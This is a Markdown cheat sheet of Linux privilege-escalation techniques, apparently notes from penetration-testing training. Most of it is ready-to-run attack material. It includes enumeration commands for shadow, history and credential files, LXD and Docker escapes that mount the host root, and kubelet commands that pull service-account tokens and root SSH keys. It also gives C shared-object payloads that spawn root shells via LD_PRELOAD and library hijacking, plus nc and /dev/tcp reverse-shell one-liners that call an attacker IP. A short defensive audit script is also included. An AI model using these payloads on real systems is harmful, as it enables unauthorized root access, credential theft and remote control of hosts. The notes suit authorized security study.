# Linux Privilege Escalation

### Enumeration

#### General command

* `whoami`
* `id`
* `hostname`
* `ip a` or `ifconfig`
* `sudo -l`

#### OS Related

* OS Version
  * `cat /etc/os-release`
* Kernel Version
  * `uname -r`
  * `uname -a`
  * `cat /proc/version`

#### Users

* LoggedIn User
  * `w`
  * `who`
  * `lastlog`
* Home Directory Content
  * `ls /home`
  * `ls -la /home/<username>/`
  * `ls -l ~/.ssh`
* Environment
  * `echo $PATH`
  * `env`
* Shell Installed
  * `cat /etc/shells`
* Bash History
  * `history`
* Sudo Privileges
  * `sudo -l`
* Users
  * `cat /etc/passwd`
  * `cat /etc/group`
  * `getent group <group>`

#### Interesting Files

* Configuration Files
  * `.conf` `.config` `.xml` `.bak`
  * `find / -type f \( -name "*.conf" -o -name "*.config" \) -exec ls -l {} \; 2>/dev/null`
  * `find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null`
* Scripts File
  * `find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"`
* Readable Shadow File
  * `/etc/shadow`
* Files & Dir
  * `find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null`
  * `find / -type d -name ".*" -ls 2>/dev/null`
  * `ls -l /tmp /var/tmp /dev/shm`
* Finding History Files
  * `find / -type f \( -name "*_hist" -o -name "*_history" \) -exec ls -l {} \; 2>/dev/null`
* Find Writable
  * Directories `find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null`
  * Files `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null`

#### Services & Internal Enumeration

* Cron Jobs
  * `ls -la /etc/cron.daily/`
* File System and Additional Drives
  * `lsblk` -> drive
  * `lpstat` -> printer
  * `cat /etc/fstab` -> drive/file system
  * `df -h` -> mounted file system
  * `cat /etc/fstab | grep -v "#" | column -t` -> unmounted file system
* Network
  * `ip a`
  * `route` - `netstat -r`
  * `arp -a`
  * `cat /etc/resolv.conf`
  * `cat /etc/hosts`
* Binaries
  * `ls -l /bin /usr/bin/ /usr/sbin/`
* Hardware
  * `lscpu`
* Running Services
  * `find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"`
* List Current Process
  * `ps aux | grep <user>/root`
  * `ps au`
* Sudo Version
  * `sudo -V`
* Installed Packages and Version
  * `apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list`

### Misconfiguration

#### Path Abuse

* Check the `PATH` environment variable (`echo $PATH`) for writable or relative entries

#### Wildcard Abuse

* Check for wildcard characters (`*`, `?`, `[]`, `~`, `-`) in commands run by scripts or cron jobs

#### `SETUID` and `SETGID` permissions

* `find "$DIRECTORY" -perm /4000`
* `find "$DIRECTORY" -perm /2000`
* `find "$DIRECTORY" -perm /u=s,g=s`
* `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null`
* `find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null`

#### Sudo Right Abuse

* `sudo -l`

#### Weak NFS

* `showmount -e 10.129.2.12`
* `cat /etc/exports`
* Copy shell to /mnt and add SETUID
  * `cp shell /mnt`
  * `chmod u+s /mnt/shell`
  * `sudo mount -t nfs 10.129.2.12:/tmp /mnt`

#### Hijacking Tmux Session

* Check for a `tmux` process running as a privileged user with a socket accessible to your group (`dev` group only)
  * `ps aux | grep tmux`
  * `ls -la /shareds`
  * `tmux -S /shareds`

### Capabilities

* `CAP_SETUID`
* `CAP_SETGID`
* `CAP_SYS_ADMIN`
* Enumerate
  * `find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;`

### Privileged Groups

* `LXC/LXD`
  * Starting a privileged container with `security.privileged=true`
  * `lxd init`
  * `lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine`
  * `lxc init alpine r00t -c security.privileged=true`
  * `lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true`
  * `lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true`
  * `lxc start r00t`
    * `lxc exec r00t /bin/sh`
* `Docker`
  * see Docker Abuse
* `Disk`
* `ADM`

### Service and process Abuse

#### Cron Job Abuse

* `/etc/cron.d`
* `ls -la /etc/cron.daily/`
* Find writable file
  * `find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null`
* Enumerate running process
  * `./pspy64 -pf -i 1000`

#### Docker Abuse

* `Docker`
  * Same enumeration as on a Linux host
  * Interesting: `docker.sock` - `/var/run/docker.sock`
    * `/tmp/docker -H unix:///app/docker.sock ps`
    * `/tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app`
    * `/tmp/docker -H unix:///app/docker.sock ps`
    * `/tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash`
    * `docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash`

#### Kubernetes

* **Each pod functions as a separate virtual machine on a node, complete with its own IP, hostname, and other details**.
* Control Plane -> master node
  * TCP etcd `2379`, `2380`
  * API Server `6443`
  * Scheduler `10251`
  * Controller manager `10252`
  * Kubelet API `10250`
  * Read-Only Kubelet API `10255`
* Minion -> Worker Node
* API Server Interaction
  * `curl https://10.129.10.11:6443 -k`
  * Extracting Pod
    * `curl https://10.129.10.11:10250/pods -k | jq .`
  * Extracting pod
    * `kubeletctl -i --server 10.129.10.11 pods`
  * Available Commands
    * `kubeletctl -i --server 10.129.10.11 scan rce`
  * Execute Command
    * `kubeletctl -i --server 10.129.10.11 exec "id" -p nginx -c nginx`
  * Extracting Token
    * `kubeletctl -i --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token`
  * Extracting Certificates
    * `kubeletctl --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt`
  * List Privileges
    * ``export token=`cat k8.token` ``
    * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.10.11:6443 auth can-i --list`
  * Creating new pod
    * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 apply -f privesc.yaml`
    * `kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 get pods`
  * Extracting root ssh key
    * `kubeletctl --server 10.129.10.11 exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc`

#### LogRotate

* `logrotate`
* `cat /etc/logrotate.conf`
* `sudo cat /var/lib/logrotate.status`
* `ls /etc/logrotate.d/`
* `cat /etc/logrotate.d/dpkg`
* Exploitation requires
  * write permission on the log files
  * run as root
  * vulnerable version e.g., 3.8.6, 3.11.0, 3.15.0, 3.18.0
* Tools - <https://github.com/whotwagner/logrotten>

### Shared Library

#### General Information

* Static libraries `.a`
  * Compiled into the program itself
* Dynamically linked shared object libraries `.so`
  * Loaded at run time, so they can be altered
* Specify location of dynamic libraries
  * when compiling `-rpath` or `-rpath-link`
  * using env `LD_RUN_PATH` or `LD_LIBRARY_PATH`
  * placing in `/lib` or `/usr/lib`
  * Changing `/etc/ld.so.conf`
  * `LD_PRELOAD` - load library before executing binary
* `ldd binary`

#### Exploiting `LD_PRELOAD`

* Compile a shared object (`.so`)

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid, setgid */

/* Built with -nostartfiles, so _init runs when the library is loaded */
void _init() {
	unsetenv("LD_PRELOAD");  /* do not re-preload into the spawned shell */
	setgid(0);
	setuid(0);
	system("/bin/bash");
}
```

* `gcc -fPIC -shared -o root.so root.c -nostartfiles`
* `sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart`

#### Shared Object Hijacking

* Search for non-standard libraries
  * use `ldd <binary>`
* Find the `RUNPATH` configuration (loads shared libraries from a custom location)
  * `readelf -d payroll | grep PATH`
* Before creating the replacement library, find the function name the binary calls
  * Run the program and note the undefined symbol error
  * Create the malicious shared object

    ```c
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    /* The exported function name must match the undefined symbol the binary imports */
    void dbquery() {
        printf("Malicious library loaded\n");
        setuid(0);
        system("/bin/sh -p");
    }
    ```
* `gcc src.c -fPIC -shared -o /development/libshared.so`

#### Python Library Hijacking

* Wrong write permission
  * Change the content of the library in the place it is used, e.g. a script importing `psutil`:

    ```python
    #!/usr/bin/env python3
    import psutil
    available_memory = psutil.virtual_memory()
    ```

    * Find the function definition in the library: `grep -r "def virtual_memory"`
* Library Path
  * `python3 -c 'import sys; print("\n".join(sys.path))'`
  * module imported from target
  * check write permission on the specific module or on a directory earlier in the path: `ls -al <path>`
* `PYTHONPATH` environment variable
  * `PYTHONPATH` is an environment variable that indicates what directory (or directories) Python can search for modules to import.
  * `sudo PYTHONPATH=/newPATHWithLib /usr/bin/python3 ./mem_status.py`
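An added audit script (not from the original notes) for the two search-path risks above, shared-object `RUNPATH` and Python's `sys.path`: it parses RPATH/RUNPATH entries from `readelf -d` output (the sample line is constructed), reports which search-path directories an unprivileged user could write to, and shows where a given module resolves and whether anything earlier in the import order is writable. The `readelf` line format is assumed to match the text form shown in the comment.

```python
import os
import re
import stat
import sys

# Assumed format of the RPATH/RUNPATH lines of `readelf -d`, e.g. "(RUNPATH)  Library runpath: [/development]"
_RUNPATH_RE = re.compile(r"\((?:RPATH|RUNPATH)\)\s+Library r(?:un)?path:\s*\[([^\]]*)\]")

def runpath_dirs(readelf_output):
    """Directories an ELF binary searches for shared objects, parsed from readelf -d output."""
    dirs = []
    for line in readelf_output.splitlines():
        m = _RUNPATH_RE.search(line)
        if m:
            dirs.extend(d for d in m.group(1).split(":") if d)
    return dirs

def untrusted_writable(path):
    """True if `path` is a directory that is world-writable or writable by the auditing user."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return stat.S_ISDIR(mode) and (bool(mode & stat.S_IWOTH) or os.access(path, os.W_OK))

def writable_search_dirs(dirs):
    """Search-path entries where a file could be planted to hijack library loading."""
    return [d for d in dirs if untrusted_writable(d)]

def module_shadow_report(module, search_path):
    """Walk search_path in import order: where `module` resolves, whether that file is
    writable, and which entries searched before it are writable (a copy there shadows it)."""
    report = {"resolved": None, "file_writable": False, "writable_before": []}
    for entry in search_path:
        d = entry or os.getcwd()  # '' in sys.path means the current working directory
        for candidate in (os.path.join(d, module + ".py"), os.path.join(d, module, "__init__.py")):
            if os.path.isfile(candidate):
                report["resolved"] = candidate
                report["file_writable"] = os.access(candidate, os.W_OK)
                return report
        if untrusted_writable(d):
            report["writable_before"].append(d)
    return report

if __name__ == "__main__":
    # Constructed sample in the shape of `readelf -d payroll | grep PATH` from the notes above
    sample = " 0x000000000000001d (RUNPATH)            Library runpath: [/development]\n"
    print("writable RUNPATH dirs:", writable_search_dirs(runpath_dirs(sample)))
    print("psutil import audit:", module_shadow_report("psutil", sys.path))
```

Run it as the unprivileged user the target script executes as; a non-empty `writable_before` list or `file_writable: True` is exactly the condition the `PYTHONPATH` and "wrong write permission" items above describe.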

### Various

#### Passive Traffic Capture

* net-creds - <https://github.com/DanMcInerney/net-creds>
* PCredz - <https://github.com/lgandx/PCredz>

### 0-day & Kernel Exploit

* Sudo
* Polkit
* DirtyPipe, DirtyCow
* Netfilter

### Rev Shell

* `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f`
* `bash -i >& /dev/tcp/10.10.14.3/443 0>&1`

### Tools

* LinEnum - [LinEnum](https://github.com/rebootuser/LinEnum)
* [LinPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
* strace - for capturing credentials
* [pspy](https://github.com/DominicBreuker/pspy)
* [logrotten](https://github.com/whotwagner/logrotten)
* [net-creds](https://github.com/DanMcInerney/net-creds)
* [PCredz](https://github.com/lgandx/PCredz)
* `readelf`
* `ldd`

### Resources

* [Escaping Restricted Shell](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#escaping-from-restricted-shells)
* [SETUID and SETGID](https://linuxconfig.org/how-to-use-special-permissions-the-setuid-setgid-and-sticky-bits)
* [GTFObins](https://gtfobins.github.io/)
